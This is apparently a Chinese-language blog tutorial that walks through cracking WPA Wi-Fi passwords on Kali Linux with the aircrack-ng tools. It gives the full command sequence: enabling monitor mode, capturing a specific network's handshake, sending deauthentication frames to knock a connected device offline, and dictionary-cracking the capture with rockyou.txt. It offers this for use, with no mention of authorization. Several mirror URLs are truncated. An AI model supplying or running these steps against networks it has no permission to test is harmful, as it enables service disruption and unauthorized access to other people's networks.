文章目录
一、将无线网卡挂载到 虚拟机上二、查看是否挂载成功三、查看网卡是否支持监听模式四、检查文件监听影响并杀死影响五、开启无线监听模式六、开始监听七、开始抓包(新建一个命令窗口)八、对已连接的终端进行攻击,使它掉线重连,以此来获取数据包。(新建一个命令窗口)九、开始解密一、将无线网卡挂载到 虚拟机上
可能出现的问题:在可移动设备处无法连接无线网卡;
解决:在虚拟机设置中将usb控制器设置成如图所示。
注意要先关闭虚拟机在设置。
二、查看是否挂载成功
使用ifconfig命令查看
三、查看网卡是否支持监听模式
1.使用su命令进入root模式
2.使用airmon-ng查看
(如果PYH一栏为null,表示不支持监听模式)
不支持监听模式解决方法:
1.更换无限网卡
2.使用监听驱动:
github网址:/aircrack-ng?tab=repositories
找到rtl8188eus下载到虚拟机里面
根据项目的介绍加载驱动
参考的文章:/answerThe/p/12488477.html
设置驱动的过程出现问题的先更新数据列表再重试
apt-get update 更新软件源中的所有软件列表。 apt-get upgrade 更新软件。 apt-get dist-upgrade 更新系统版本。reboot 重启
更新数据源:
使用vim /etc/apt/sources.list添加 下列
中科大deb http://mirrors./kali kali-rolling main non-free contribdeb-src http://mirrors./kali kali-rolling main non-free contrib阿里云deb /kali kali-rolling main non-free contribdeb-src /kali kali-rolling main non-free contrib清华大学deb http://mirrors.tuna./kali kali-rolling main contrib non-freedeb-src https://mirrors.tuna./kali kali-rolling main contrib non-free浙大deb http://mirrors./kali kali-rolling main contrib non-freedeb-src http://mirrors./kali kali-rolling main contrib non-free
四、检查文件监听影响并杀死影响
airmon-ng check 检查影响
airmon-ng check kill
五、开启无线监听模式
airmon-ng start wlan0
六、开始监听
airodump-ng wlan0
即可查看周边wifi
七、开始抓包(新建一个命令窗口)
airodump-ng --bssid CC:1A:FA:6C:87:35 -c 11-w /home/ wlan0
格式:airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon
(bssid就是要抓取包的mac地址,信道频率 是CH,)
以第二个为例:
八、对已连接的终端进行攻击,使它掉线重连,以此来获取数据包。(新建一个命令窗口)
以信号最强的为例
(PWD为信号强度,越小信号越强)
aireplay-ng -0 2 -a CC:1A:FA:6C:87:35 -c F4:8B:32:71:AE:09 wlan0
一直重复此命令直到上一步抓包出现wpa
九、开始解密
1.先将kali自带的字典解压:
gzip -d /usr/share/wordlists/rockyou.txt.gz
2.开始解密
aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/huoqu/test02/-01.cap
/home/huoqu/test02/-01.cap就是之前抓包存放的地址
接下来就是漫长的等待
也有可能解密不成功,这就是字典的问题,字典越大,越容易成功,也可在网上下载其他字典
